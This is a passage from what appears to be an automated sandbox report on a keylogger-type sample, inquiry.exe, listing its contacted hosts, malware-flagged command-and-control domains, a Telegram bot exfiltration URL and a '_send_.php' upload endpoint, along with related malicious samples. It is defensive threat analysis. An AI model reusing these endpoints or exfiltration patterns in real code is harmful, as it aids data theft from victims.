                                  https://www.office.com/lBMSBuild.exe, 0000000A.00000002.3761177777.0000000002AF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ftp.fastestpay.digitalMSBuild.exe, 0000000A.00000002.3761177777.0000000002B35000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://upx.sf.netAmcache.hve.15.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.orgMSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://chrome.google.com/webstore?hl=enMSBuild.exe, 0000000A.00000002.3761177777.0000000002AC7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.ecosia.org/newtab/MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://varders.kozow.com:8081inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://aborters.duckdns.org:8081inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  https://ac.ecosia.org/autocomplete?q=MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://51.38.247.67:8081/_send_.php?LMSBuild.exe, 0000000A.00000002.3761177777.0000000002B23000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20aMSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/8.46.123.33$MSBuild.exe, 0000000A.00000002.3761177777.00000000029AD000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://anotherarmy.dns.army:8081inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: malware
                                  unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchMSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://checkip.dyndns.org/qinquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://chrome.google.com/webstore?hl=enlBMSBuild.exe, 0000000A.00000002.3761177777.0000000002AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://reallyfreegeoip.orgMSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.00000000029F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://chrome.google.com/webstore?hl=enPMSBuild.exe, 0000000A.00000002.3761177777.0000000002AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMSBuild.exe, 0000000A.00000002.3761177777.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=MSBuild.exe, 0000000A.00000002.3763031481.0000000003951000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3763031481.0000000003C45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedinquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://reallyfreegeoip.org/xml/inquiry.exe, 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002983000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3758812788.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  149.154.167.220
                                  api.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUtrue
                                  192.64.117.204
                                  ftp.fastestpay.digitalUnited States
                                  22612NAMECHEAP-NETUStrue
                                  188.114.96.3
                                  reallyfreegeoip.orgEuropean Union
                                  13335CLOUDFLARENETUStrue
                                  158.101.44.242
                                  checkip.dyndns.comUnited States
                                  31898ORACLE-BMC-31898UStrue
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1518503
                                  Start date and time:2024-09-25 18:49:20 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 43s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:24
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:inquiry.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@5/4
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 90%
                                  • Number of executed functions: 75
                                  • Number of non-executed functions: 21
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 13.95.65.251, 40.126.31.71, 40.126.31.69, 20.190.159.0, 20.190.159.71, 40.126.31.67, 40.126.31.73, 20.190.159.75, 20.190.159.4, 199.232.210.172, 13.85.23.86, 20.242.39.171, 52.168.117.173, 40.69.42.241, 93.184.221.240
                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, twc.trafficmanager.net, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                  • VT rate limit hit for: inquiry.exe
                                  TimeTypeDescription
                                  12:50:22API Interceptor36x Sleep call for process: powershell.exe modified
                                  12:50:26API Interceptor9454676x Sleep call for process: MSBuild.exe modified
                                  14:45:33API Interceptor1x Sleep call for process: WerFault.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  149.154.167.220Confirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                    SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                    Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      192.64.117.204hesaphareketi-01_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        188.114.96.3Sept order.docGet hashmaliciousFormBookBrowse
                                                        • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                                        1e#U0414.exeGet hashmaliciousLokibotBrowse
                                                        • dddotx.shop/Mine/PWS/fre.php
                                                        https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                                        • hdcy.emcl00.com/qRCfs/
                                                        PO23100072.exeGet hashmaliciousFormBookBrowse
                                                        • www.cc101.pro/ttiz/
                                                        RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                        • www.1win-moldovia.fun/1g7m/
                                                        TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                        • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                                        Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                                                        • www.chinaen.org/zi4g/
                                                        Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                                                        • werdotx.shop/Devil/PWS/fre.php
                                                        Quotes updates request.exeGet hashmaliciousFormBookBrowse
                                                        • www.1win-moldovia.fun/1g7m/
                                                        PO-001.exeGet hashmaliciousFormBookBrowse
                                                        • www.1win-moldovia.fun/kslt/
                                                        158.101.44.242SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Pedido de GmbH.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        TT copy for SO-2409-032.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        invoice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        2240902473.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        PAYSLIP.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Drawing_Products_Materials_and_Samples_IMG.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Enquiry 88210103.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        Items IMG16092024.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • checkip.dyndns.org/
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        reallyfreegeoip.orgSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.97.3
                                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                        • 188.114.97.3
                                                        ftp.fastestpay.digitalhesaphareketi-01_pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 192.64.117.204
                                                        checkip.dyndns.comSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.247.73
                                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 132.226.247.73
                                                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                        • 132.226.247.73
                                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 132.226.247.73
                                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        bg.microsoft.map.fastly.nethttps://usa-usps-yd.top/usGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://docu.lafolieduocehotels.com/document/?top=cyndie.winger@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.214.172
                                                        https://7wt31.croftanix.com/aaEPO/Get hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.214.172
                                                        https://fub.direct/1/1ZAH5Mt3Bpz8Cpn5NjLaqK_rAFuYfYbOLIjtw_PUk49CrbkVZ55QiQUv5JPS9i0PJ4bG6nuI1uhGp0DFMMhRRiMMBMgLF4xCijfUVIxAtV0/https/jogotuneldotempo.com.br/g63b/1697895341/Phocuswright/#?email=c2FsZXNAcGhvY3Vzd3JpZ2h0LmNvbQ==f0CoUObh?domain=fub.directGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        https://gitq.kontra-werbetechnik.eu/AQbvvGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 199.232.214.172
                                                        https://texicoschools-my.sharepoint.com/:f:/p/bhadley/EsaMKJ-X61dEm1tZEaws2DMBSjLuzfhGBl4pu2aaho1XiQ?e=fJogeVGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        172726980749816c49da3d830f60283a5a8c1eb734c1073708bb8560faf023d1eb70975126808.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        http://mir-belting.comGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        https://odo1s.risongeye.com/oTUk/Get hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.210.172
                                                        api.telegram.orgConfirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                                        • 149.154.167.220
                                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        TELEGRAMRUConfirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                                        • 149.154.167.220
                                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 149.154.167.220
                                                        CLOUDFLARENETUShttps://www.google.fr/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2F%63%61%73%61%64%65%72%65%73%74%61%75%72%61%63%69%6F%6E%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%68%6F%6C%79%2F%69%6E%64%65%78%73%79%6E%31%2E%68%74%6D%6C%23c2FyYWhsQGNkYXRhLmNvbQ==Get hashmaliciousUnknownBrowse
                                                        • 104.21.34.147
                                                        HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                        • 104.21.51.224
                                                        TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                        • 188.114.97.3
                                                        https://maveuve.github.io/frlpodf/marynewreleasefax.htmlGet hashmaliciousRemcosBrowse
                                                        • 104.18.95.41
                                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.208.139
                                                        LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.206.221
                                                        BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                        • 172.67.206.221
                                                        7Ekgc5sWNB.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.132.154
                                                        HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                        • 104.21.51.224
                                                        https://smky.app/nmmlzm.binGet hashmaliciousUnknownBrowse
                                                        • 104.18.24.139
                                                        ORACLE-BMC-31898USSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.130.0
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 158.101.44.242
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        rcontractorder.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 193.122.6.168
                                                        rdoc17000320240923070456.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.6.168
                                                        rPEDIDO-M456.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 193.122.130.0
                                                        NAMECHEAP-NETUSPO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.238.43
                                                        http://hscpoly.marksbookspace.shop/?/Hscpoly/Hscpoly#Bob.Jenkins@Hscpoly.Com##Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                        • 192.64.119.254
                                                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                        • 199.192.19.19
                                                        CYTAT.exeGet hashmaliciousFormBookBrowse
                                                        • 63.250.47.40
                                                        UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 162.213.249.216
                                                        QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.238.43
                                                        RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                                        • 162.0.236.169
                                                        https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/index.htmlGet hashmaliciousUnknownBrowse
                                                        • 199.192.20.176
                                                        https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDIN/Get hashmaliciousUnknownBrowse
                                                        • 199.192.20.176
                                                        https://kps.bharmalsystems.net/files/linkedIn/AZ-ULTIMATE-LINKEDINGet hashmaliciousUnknownBrowse
                                                        • 199.192.20.176
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        54328bd36c14bd82ddaa0c04b25ed9adSecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        E-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        z84TTREMITTANCEUSD347_432_63.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 188.114.96.3
                                                        3b5074b1b5d032e5620f69f9f700ff0eConfirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 149.154.167.220
                                                        SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        • 149.154.167.220
                                                        https://osoulksa.com/c/FidelitymeGet hashmaliciousHTMLPhisherBrowse
                                                        • 149.154.167.220
                                                        http://rkanet.comGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        NTGcon.msiGet hashmaliciousUnknownBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                        • 149.154.167.220
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        • 149.154.167.220
                                                        No context
                                                        Process:C:\Windows\System32\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
